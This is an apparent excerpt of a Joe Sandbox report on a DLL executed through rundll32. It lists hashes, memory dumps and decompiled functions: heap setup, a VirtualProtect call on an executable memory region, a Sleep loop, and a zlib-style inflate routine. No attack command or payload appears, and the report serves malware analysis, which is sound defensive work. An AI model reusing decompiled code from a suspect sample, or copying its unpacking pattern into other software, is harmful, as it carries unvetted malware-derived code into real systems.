Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2b86755eef37e4a4fa72631b151954adccbf1efd625a4e0672fc03aa96f5a87e
Instruction ID: a0e348b1a09c93d8210d5bf6eb699b5a5c7c1c68a6564356cb742122b7ca74c2
Opcode Fuzzy Hash: 2b86755eef37e4a4fa72631b151954adccbf1efd625a4e0672fc03aa96f5a87e
Instruction Fuzzy Hash: 6EC04031156250DFE740DBD4CC89F443FA5BF48311FA14690F515E65F6C73174419B11

Uniqueness

Uniqueness Score: -1.00%

Function 10009525 Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10009525(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x10020e64, 8, _a4); // executed
				return _t2;
			}

0x10009533
0x1000953a

APIs

RtlAllocateHeap.76D4C8D1(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c47fbf19ee1032a5d2d03ede0c8a872dd99239ed7408605079bd50c5965fc2cb
Instruction ID: 4cd8767747614ece8a9ef239bc440430a38d3079d97625af413d2659be67539a
Opcode Fuzzy Hash: c47fbf19ee1032a5d2d03ede0c8a872dd99239ed7408605079bd50c5965fc2cb
Instruction Fuzzy Hash: 90B09231080318BBEE021B81ED4AA843F6EFB19762F018090F608050B6CAB3A8A09B80

Uniqueness

Uniqueness Score: -1.00%

Function 10009510 Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10009510() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x10020e64 = _t1;
				return _t1;
			}

0x10009519
0x1000951f
0x10009524

APIs

HeapCreate.KERNELBASE(00000000,00096000,00000000,100010B7), ref: 10009519

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: ebb8cc13c00220491c8ace43191d6d9e5cbbcd3e021c18b2d0a2ef1822ffc219
Instruction ID: 17def3ddeca452d98569a718cab1156e5cb949d4afb7e22c317f5298dc0ffc81
Opcode Fuzzy Hash: ebb8cc13c00220491c8ace43191d6d9e5cbbcd3e021c18b2d0a2ef1822ffc219
Instruction Fuzzy Hash: 93B012B428131097FA104B104D86B0035515748B02F204005F601581E4C6F11040D525

Uniqueness

Uniqueness Score: -1.00%

Function 047D06E2 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 047D06E3

Memory Dump Source

Source File: 0000000E.00000003.33834914479.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_47d0000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 88fe856744cc425360d1a30c9bc8a59b032be182b301bf16f64d1c2a92f0268a
Instruction ID: 28e99844ac4fb60ca3db8cc0d899ef2162ad071c7b9699c5706c9853197dbfcb
Opcode Fuzzy Hash: 88fe856744cc425360d1a30c9bc8a59b032be182b301bf16f64d1c2a92f0268a
Instruction Fuzzy Hash: 1DB01270634044DBD75C87118848E5D7A30FB01205F009880E0C3F2204DA30E9415B30

Uniqueness

Uniqueness Score: -1.00%

Function 047D0105 Relevance: 1.4, APIs: 1, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000003.33834914479.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_47d0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30269b090895166bbe13c55bfc90a8f6ec17342fa027b451788cb05830dff57e
Instruction ID: 0791910b72c8a7837f4e7eaace487f8a9e1bed702f1ae69bea31a448a01ba071
Opcode Fuzzy Hash: 30269b090895166bbe13c55bfc90a8f6ec17342fa027b451788cb05830dff57e
Instruction Fuzzy Hash: 2C51B071E34388DFEB24DFA9D8887AC77B0EB08309F94646AE4456B352E3357980DB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABCF Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000ABCF(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E1000B9C1(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}

0x1000abd2
0x1000abd3
0x1000abd6
0x1000abd9
0x1000abde
0x1000abe1
0x1000abe4
0x1000abe4
0x1000abec
0x1000abf1
0x1000abf4
0x1000abf7
0x1000abfa
0x1000abfd
0x1000ac10
0x1000ac11
0x1000ac14
0x1000ac1a
0x1000ac1d
0x1000ac20
0x00000000
0x00000000
0x1000ac22
0x00000000
0x1000ac20
0x1000ac26
0x1000ac26
0x1000ac28
0x1000ac28
0x1000ac2b
0x1000ac2b
0x1000ac30
0x1000ac38
0x1000ac44

APIs

Sleep.KERNELBASE(0000000A), ref: 1000AC38

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0c40166de47bb0dd70a3ea95c49e5e074fb2617b4ba7f5ff59f65a45c3ad187d
Instruction ID: 66f6f85122bc0b5e4dd60674b04f8dfa5216e6efcab965929a2ae1e5fa2a9f07
Opcode Fuzzy Hash: 0c40166de47bb0dd70a3ea95c49e5e074fb2617b4ba7f5ff59f65a45c3ad187d
Instruction Fuzzy Hash: C2115B31A00305AFEB04CFA9C984B99B7E8EF452A4F118569E85AEB305C374E980CB40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1001799F Relevance: 8.1, Strings: 6, Instructions: 577
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E1001799F(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x1001f040 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x1001f040 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x1001f040 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x1001f040 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x1001f040 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x1001791c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x1001791c + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x1001791c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x1001791c + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}

0x1001799f
0x100179a4
0x100179a5
0x100179a8
0x100179a9
0x100179ad
0x100179b3
0x100179ba
0x100179be
0x100179c6
0x100179c9
0x100179da
0x100179de
0x100179e2
0x100179ec
0x100179f0
0x100179ff
0x10017a0d
0x10017a11
0x10017a17
0x10017a1a
0x10017a1e
0x10017a22
0x10017a26
0x10017a29
0x10017a2c
0x10017a30
0x10017a36
0x10017a5a
0x10017a60
0x10017a66
0x10017a67
0x10017a69
0x10017a6c
0x10017a6e
0x00000000
0x10017a6e
0x00000000
0x10017a38
0x10017a3b
0x10017a4e
0x10017a4e
0x10017a4e
0x10017a50
0x10017a54
0x10017a72
0x10017a72
0x10017a76
0x10017a76
0x10017a7d
0x00000000
0x00000000
0x10017a83
0x10017af0
0x10017af3
0x10017af7
0x10017af9
0x10017afb
0x10017b00
0x10017b00
0x10017b0b
0x10017b0e
0x10017b10
0x10017b12
0x10017b16
0x10017b1b
0x10017b1b
0x10017b1b
0x10017b33
0x10017b36
0x10017b3a
0x10017c36
0x10017f4a
0x10017f4c
0x10017f5a
0x10017f5f
0x10017f4e
0x10017f4e
0x10017f53
0x10017f53
0x10017f76
0x10017f76
0x10017f7c
0x10017f7e
0x10017f7e
0x10017f84
0x00000000
0x10017f84
0x10017c4c
0x00000000
0x10017c4c
0x10017b40
0x10017b43
0x10017b47
0x10017b4d
0x10017b4f
0x10017b51
0x10017b56
0x10017b58
0x10017b58
0x10017b62
0x10017b64
0x10017b66
0x10017b68
0x10017b68
0x10017b6a
0x10017b71
0x10017b75
0x10017b77
0x10017b79
0x10017b7e
0x10017b7e
0x10017b8a
0x10017b8d
0x10017b8f
0x10017b94
0x10017b96
0x10017b98
0x10017b9c
0x00000000
0x00000000
0x10017c56
0x10017f3e
0x10017f3e
0x10017f43
0x00000000
0x10017f43
0x10017c6c
0x10017c6c
0x10017ba2
0x10017ba5
0x10017c0f
0x10017bce
0x10017bce
0x10017bd4
0x10017bda
0x10017c76
0x10017c7a
0x10017c7c
0x10017c82
0x10017f66
0x10017f66
0x10017f6a
0x10017f6f
0x00000000
0x10017f6f
0x10017c88
0x10017c8f
0x10017cb5
0x10017cbb
0x10017ceb
0x10017ced
0x10017cf3
0x10017cf7
0x10017cf7
0x10017cf7
0x10017cfb
0x10017cfb
0x10017cbd
0x10017cc3
0x10017cc5
0x10017cc7
0x10017ccd
0x10017cd1
0x10017cd1
0x10017cd1
0x10017cd3
0x10017cd7
0x10017cdd
0x10017ce1
0x10017ce1
0x10017ce1
0x10017ce5
0x10017ce5
0x10017cdd
0x10017ccd
0x10017c91
0x10017c93
0x10017c95
0x10017c9b
0x10017c9f
0x10017c9f
0x10017c9f
0x10017ca3
0x10017ca3
0x10017c9b
0x10017cfd
0x10017cff
0x10017cff
0x10017cff
0x10017d01
0x00000000
0x10017d01
0x10017be6
0x10017be8
0x10017bed
0x10017bf5
0x10017bf8
0x10017bfb
0x10017c01
0x10017c01
0x10017c01
0x10017c03
0x10017c17
0x10017c17
0x10017c1c
0x10017c1e
0x10017c21
0x10017c24
0x10017c27
0x10017c2a
0x10017c2d
0x10017c2d
0x10017c2d
0x10017c2d
0x00000000
0x10017c0f
0x10017ba9
0x10017baf
0x10017bb1
0x10017bb3
0x10017bb8
0x10017bba
0x10017bba
0x10017bc4
0x10017bc6
0x10017bc8
0x10017bca
0x00000000
0x10017bca
0x10017b1c
0x10017b1c
0x10017f88
0x10017f8f
0x10017f91
0x10017f91
0x10017f93
0x10017f99
0x10017f9c
0x10017f9f
0x10017fa4
0x10017fa6
0x10017fa9
0x10017fac
0x10017fae
0x10017fb6
0x10017fba
0x10017fbc
0x10017fc0
0x10017fc8
0x10017fc8
0x10017fcc
0x10017fd5
0x10017fdd
0x10017fdf
0x10017fe2
0x10017fe5
0x10017fe5
0x10017fe9
0x10017fec
0x10017ff2
0x10018005
0x10017ff4
0x10017ff9
0x10017ff9
0x10018008
0x1001800e
0x10018027
0x10018010
0x10018018
0x10018018
0x1001802d
0x10018032
0x10018032
0x10017a85
0x10017a86
0x10017a87
0x10017a88
0x10017a89
0x10017a8d
0x10017a94
0x10017a95
0x10017a96
0x10017a97
0x10017a99
0x10017adf
0x10017adf
0x10017ae9
0x10017ae9
0x10017aea
0x10017aeb
0x10017aec
0x00000000
0x10017aec
0x10017a9d
0x10017aa5
0x00000000
0x10017ab7
0x10017abc
0x10017ac7
0x00000000
0x10017ad3
0x10017ad3
0x00000000
0x10017ad3
0x10017ac7
0x10017aa5
0x10017d0c
0x10017d0e
0x10017d11
0x10017d13
0x10017d17
0x10017d1a
0x10017d1f
0x10017d22
0x10017d25
0x10017d2c
0x10017d2c
0x10017d32
0x10017d34
0x10017d37
0x10017d3a
0x10017d3d
0x10017d40
0x10017d43
0x10017d43
0x10017d46
0x10017d49
0x10017d4c
